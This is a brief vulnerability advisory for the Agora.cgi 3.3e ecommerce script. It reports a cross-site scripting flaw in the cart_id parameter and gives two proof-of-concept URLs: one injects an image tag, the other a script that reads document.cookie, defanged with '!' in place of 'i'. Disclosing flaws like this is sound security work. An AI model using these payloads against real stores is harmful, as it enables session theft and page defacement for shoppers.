|
|
| |
| Agora.cgi is an open source ecommerce solution. A security vulnerability in the product allows attackers to insert malicious content into existing web pages by exploiting the Cross-Site Scripting Vulnerability. |
| |
Credit:
The information has been provided by Tamer Sahin.
|
| |
Vulnerable systems:
Agoracgi version 3.3e
Exploit:
(NOTE, The letter 'I' in the word SCRIPT has been replaced with an '!' to prevent the script from being active)
http://www.example.com/store/agora.cgi?cart_id=<IMG%20height=47%20src
="http://www.securityoffice.net/images/title.gif"%20width=406%20border
=0>&xm=on&product=HTML
http://www.example.com/store/agora.cgi?cart_id=<scr!pt>alert(document
.cookie)</script>&xm=on&product=HTML
|
|
|